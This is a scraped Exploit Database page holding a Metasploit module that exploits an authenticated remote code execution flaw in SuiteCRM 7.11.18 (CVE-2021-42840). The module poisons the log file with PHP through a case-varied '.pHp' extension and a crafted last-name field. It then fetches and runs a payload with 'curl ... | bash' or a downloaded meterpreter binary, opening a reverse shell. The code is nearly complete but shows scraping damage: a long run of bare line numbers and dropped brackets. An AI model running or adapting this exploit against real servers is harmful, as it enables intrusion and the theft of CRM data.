SuiteCRM 7.11.18 – Remote Code Execution (RCE) (Authenticated) (Metasploit)

Exploit Database
117 阅读

作者： M. Cory Billington

日期： 2021-11-17
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/50531/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

222

223

224

225

226

227

228

229

230

231

232

233

234

235

236

237

238

239

240

241

242

243

244

245

246

247

248

249

250

251

252

253

254

255

256

257

258

259

260

261

262

263

264

265

266

267

268

269

270

271

272

273

274

275

276

277

278

279

280

281

282

283

284

285

286

287

288

289

290

291

292

293

294

295

296

297

298

299

300

301

302

303

304

305

306

307

308

309

310

311

312

313

314

315

316

317

318

319

320

321

322

323

324

325

326

327

328

329

330

331

332

333

334

335

336

337

338

339

340

341

342

343

344

# This module requires Metasploit: https://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

class MetasploitModule < Msf::Exploit::Remote

Rank = GoodRanking

include Msf::Exploit::Remote::HttpClient

include Msf::Exploit::Remote::CmdStager

include Msf::Exploit::FileDropper

prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})

super(

update_info(

info,

'Name' => 'SuiteCRM Log File Remote Code Execution',

'Description' => %q{

This module exploits an input validation error on the log file extension parameter. It does

not properly validate upper/lower case characters. Once this occurs, the application log file

will be treated as a php file. The log file can then be populated with php code by changing the

username of a valid user, as this info is logged. The php code in the file can then be executed

by sending an HTTP request to the log file. A similar issue was reported by the same researcher

where a blank file extension could be supplied and the extension could be provided in the file

name. This exploit will work on those versions as well, and those references are included.

'License' => MSF_LICENSE,

'Author' => [

'M. Cory Billington' # @_th3y

'References' => [

['CVE', '2021-42840'],

['CVE', '2020-28328'], # First CVE

['EDB', '49001'], # Previous exploit, this module will cover those versions too. Almost identical issue.

['URL', 'https://theyhack.me/CVE-2020-28320-SuiteCRM-RCE/'], # First exploit

['URL', 'https://theyhack.me/SuiteCRM-RCE-2/'] # This exploit

'Platform' => %w[linux unix],

'Arch' => %w[ARCH_X64 ARCH_CMD ARCH_X86],

'Targets' => [

[

'Linux (x64)', {

'Arch' => ARCH_X64,

'Platform' => 'linux',

'DefaultOptions' => {

'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'

}

[

'Linux (cmd)', {

'Arch' => ARCH_CMD,

'Platform' => 'unix',

'DefaultOptions' => {

'PAYLOAD' => 'cmd/unix/reverse_bash'

}

]

'Notes' => {

'Stability' => [CRASH_SAFE],

'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],

'Reliability' => [REPEATABLE_SESSION]

'Privileged' => true,

'DisclosureDate' => '2021-04-28',

'DefaultTarget' => 0

)

register_options(

[

OptString.new('TARGETURI', [true, 'The base path to SuiteCRM', '/']),

OptString.new('USER', [true, 'Username of user with administrative rights', 'admin']),

OptString.new('PASS', [true, 'Password for administrator', 'admin']),

OptBool.new('RESTORECONF', [false, 'Restore the configuration file to default after exploit runs', true]),

OptString.new('WRITABLEDIR', [false, 'Writable directory to stage meterpreter', '/tmp']),

OptString.new('LASTNAME', [false, 'Admin user last name to clean up profile', 'admin'])

]

)

end

def check

authenticate unless @authenticated

return Exploit::CheckCode::Unknown unless @authenticated

version_check_request = send_request_cgi(

{

'method' => 'GET',

'uri' => normalize_uri(target_uri.path, 'index.php'),

'keep_cookies' => true,

'vars_get' => {

'module' => 'Home',

'action' => 'About'

}

)

return Exploit::CheckCode::Unknown("#{peer} - Connection timed out") unless version_check_request

version_match = version_check_request.body[/

Version

\d{1} # Major revision

\d{1,2} # Minor revision

\d{1,2} # Bug fix release

/x]

version = version_match.partition(' ').last

if version.nil? || version.empty?

about_url = "#{full_uri}#{normalize_uri(target_uri, 'index.php')}?module=Home&action=About"

return Exploit::CheckCode::Unknown("Check #{about_url} to confirm version.")

end

patched_version = Rex::Version.new('7.11.18')

current_version = Rex::Version.new(version)

return Exploit::CheckCode::Appears("SuiteCRM #{version}") if current_version <= patched_version

Exploit::CheckCode::Safe("SuiteCRM #{version}")

end

def authenticate

print_status("Authenticating as #{datastore['USER']}")

initial_req = send_request_cgi(

{

'method' => 'GET',

'uri' => normalize_uri(target_uri, 'index.php'),

'keep_cookies' => true,

'vars_get' => {

'module' => 'Users',

'action' => 'Login'

}

)

return false unless initial_req && initial_req.code == 200

{

'method' => 'POST',

'uri' => normalize_uri(target_uri, 'index.php'),

'keep_cookies' => true,

'vars_post' => {

'module' => 'Users',

'action' => 'Authenticate',

'return_module' => 'Users',

'return_action' => 'Login',

'user_name' => datastore['USER'],

'username_password' => datastore['PASS'],

'Login' => 'Log In'

}

)

return false unless login && login.code == 302

res = send_request_cgi(

{

'method' => 'GET',

'uri' => normalize_uri(target_uri, 'index.php'),

'keep_cookies' => true,

'vars_get' => {

'module' => 'Administration',

'action' => 'index'

}

)

auth_succeeded?(res)

end

def auth_succeeded?(res)

return false unless res

if res.code == 200

print_good("Authenticated as: #{datastore['USER']}")

if res.body.include?('Unauthorized access to administration.')

print_warning("#{datastore['USER']} does not have administrative rights! Exploit will fail.")

@is_admin = false

else

print_good("#{datastore['USER']} has administrative rights.")

@is_admin = true

end

@authenticated = true

return true

else

print_error("Failed to authenticate as: #{datastore['USER']}")

return false

end

def post_log_file(data)

send_request_cgi(

{

'method' => 'POST',

'uri' => normalize_uri(target_uri, 'index.php'),

'ctype' => "multipart/form-data; boundary=#{data.bound}",

'keep_cookies' => true,

'headers' => {

'Referer' => "#{full_uri}#{normalize_uri(target_uri, 'index.php')}?module=Configurator&action=EditView"

'data' => data.to_s

}

)

end

def modify_system_settings_file

filename = rand_text_alphanumeric(8).to_s

extension = '.pHp'

@php_fname = filename + extension

action = 'Modify system settings file'

print_status("Trying - #{action}")

data = Rex::MIME::Message.new

data.add_part('SaveConfig', nil, nil, 'form-data; name="action"')

data.add_part('Configurator', nil, nil, 'form-data; name="module"')

data.add_part(filename.to_s, nil, nil, 'form-data; name="logger_file_name"')

data.add_part(extension.to_s, nil, nil, 'form-data; name="logger_file_ext"')

data.add_part('info', nil, nil, 'form-data; name="logger_level"')

data.add_part('Save', nil, nil, 'form-data; name="save"')

res = post_log_file(data)

check_logfile_request(res, action)

end

def poison_log_file

action = 'Poison log file'

if target.arch.first == 'cmd'

command_injection = "<?php <code>curl #{@download_url} | bash</code>; ?>"

else

@meterpreter_fname = "#{datastore['WRITABLEDIR']}/#{rand_text_alphanumeric(8)}"

command_injection = %(

<?php <code>curl #{@download_url} -o #{@meterpreter_fname};

/bin/chmod 700 #{@meterpreter_fname};

/bin/sh -c #{@meterpreter_fname};</code>; ?>

)

end

print_status("Trying - #{action}")

data = Rex::MIME::Message.new

data.add_part('Users', nil, nil, 'form-data; name="module"')

data.add_part('1', nil, nil, 'form-data; name="record"')

data.add_part('Save', nil, nil, 'form-data; name="action"')

data.add_part('EditView', nil, nil, 'form-data; name="page"')

data.add_part('DetailView', nil, nil, 'form-data; name="return_action"')

data.add_part(datastore['USER'], nil, nil, 'form-data; name="user_name"')

data.add_part(command_injection, nil, nil, 'form-data; name="last_name"')

res = post_log_file(data)

check_logfile_request(res, action)

end

def restore

action = 'Restore logging to default configuration'

print_status("Trying - #{action}")

data = Rex::MIME::Message.new

data.add_part('SaveConfig', nil, nil, 'form-data; name="action"')

data.add_part('Configurator', nil, nil, 'form-data; name="module"')

data.add_part('suitecrm', nil, nil, 'form-data; name="logger_file_name"')

data.add_part('.log', nil, nil, 'form-data; name="logger_file_ext"')

data.add_part('fatal', nil, nil, 'form-data; name="logger_level"')

data.add_part('Save', nil, nil, 'form-data; name="save"')

post_log_file(data)

data = Rex::MIME::Message.new

data.add_part('Users', nil, nil, 'form-data; name="module"')

data.add_part('1', nil, nil, 'form-data; name="record"')

data.add_part('Save', nil, nil, 'form-data; name="action"')

data.add_part('EditView', nil, nil, 'form-data; name="page"')

data.add_part('DetailView', nil, nil, 'form-data; name="return_action"')

data.add_part(datastore['USER'], nil, nil, 'form-data; name="user_name"')

data.add_part(datastore['LASTNAME'], nil, nil, 'form-data; name="last_name"')

res = post_log_file(data)

print_error("Failed - #{action}") unless res && res.code == 301

print_good("Succeeded - #{action}")

end

def check_logfile_request(res, action)

fail_with(Failure::Unknown, "#{action} - no reply") unless res

unless res.code == 301

print_error("Failed - #{action}")

fail_with(Failure::UnexpectedReply, "Failed - #{action}")

end

print_good("Succeeded - #{action}")

end

def execute_php

print_status("Executing php code in log file: #{@php_fname}")

res = send_request_cgi(

{

'uri' => normalize_uri(target_uri, @php_fname),

'keep_cookies' => true

}

)

fail_with(Failure::NotFound, "#{peer} - Not found: #{@php_fname}") if res && res.code == 404

register_files_for_cleanup(@php_fname)

register_files_for_cleanup(@meterpreter_fname) unless @meterpreter_fname.nil? || @meterpreter_fname.empty?

end

def on_request_uri(cli, _request)

send_response(cli, payload.encoded, { 'Content-Type' => 'text/plain' })

print_good("#{peer} - Payload sent!")

end

def start_http_server

start_service(

{

'Uri' => {

'Proc' => proc do |cli, req|

on_request_uri(cli, req)

end,

'Path' => resource_uri

}

)

@download_url = get_uri

end

def exploit

start_http_server

authenticate unless @authenticated

fail_with(Failure::NoAccess, datastore['USER'].to_s) unless @authenticated

fail_with(Failure::NoAccess, "#{datastore['USER']} does not have administrative rights!") unless @is_admin

modify_system_settings_file

poison_log_file

execute_php

ensure

restore if datastore['RESTORECONF']

end